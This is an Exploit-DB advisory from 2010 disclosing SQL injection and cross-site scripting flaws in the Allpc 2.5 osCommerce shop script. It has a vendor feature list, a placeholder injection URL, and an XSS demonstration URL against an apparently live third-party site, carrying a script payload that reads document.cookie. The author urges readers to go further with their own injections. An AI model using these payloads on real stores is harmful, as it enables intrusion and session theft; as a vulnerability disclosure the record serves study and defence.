Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting

EDB-ID:

15128




Platform:

Windows_x86

Date:

2010-09-27


[+]Title           Allpc 2.5 osCommerce  SQL-i/XSS Multiple Vulnerabilities
[+]Author          **RoAd_KiLlEr**
[+]Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on      Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Version:  	2.5
[~] Vendor: http://www.allpcscript.com
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]Description:
Compatible with all versions of PHP 4 and above. 
It uses a database MySQL. 
It works in 4 languages, which are easily replaced in the administration panel. 

* Appearance: 
- The client part 
- Administration 

* Install / Installation 
- Simple automatic installation via the web-browser 

* Design / Placement 
- A simple change of patterns 
- Support for dynamic images 

* Administration / Functional 
- Supports unlimited products and categories 
The structure of products in categories 
The structure of the categories to the categories 
- Add / edit / delete categories, products, manufacturers, customers, and reviews 
- Support for physical (shippable) and virtual (zagruzhaemye) products 
- Land Administration is protected with username and password 
- Contact customers directly via email or contact the user 
- Easy to book and restore the database 
- Print invoices and packaging lists from the order 
- Statistics for products and customers 
- Multilingual support 
- Support the use of multiple currencies 
- Automatic exchange rates 
- Select what to display, and in what order the product that make the list page 
- Support for static and dynamic banners with full statistics
=========================================

[+].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+

[P0C]:  http://127.0.0.1/allpc25free/product_info.php?products_id=[SQL Injection] 

[DemO]: http://127.0.0.1/allpc25free/product_info.php?products_id=[SQL Injection]

[+]. XSS Vulnerability
=+=+=+=+=+=+=+=+=

The Search B0x of this script is vulnerable to XSS,because it fails to properly sanitize the response.
By submitting a malicious input to the web site, the user would only be able to compromise their security.That is their own browser cookies, cache objects, and so forth. 


[DemO]: http://neways4u.com/advanced_search_result.php?keywords=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

[Atack Pattern]: "><script>alert(document.cookie)</script> 

 I used this pattern to show you that is vulnerable,but you can try HTML Injection,Url Redirect, Iframe,Etc.. Basically Your own Imagination is your Limit.. 
 Good Luck :P 


===========================================================================================
[!] Albanian Hacking Crew           
===========================================================================================
[!] **RoAd_KiLlEr**   
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | The|DennY` | EaglE EyE | THE_1NV1S1BL3 & All Albanian/Kosova Hackers 
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka | Sid3^effects| L0rd CruSad3r | SONIC | MaFFiTeRRoR | All  Inj3ct0r.com Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================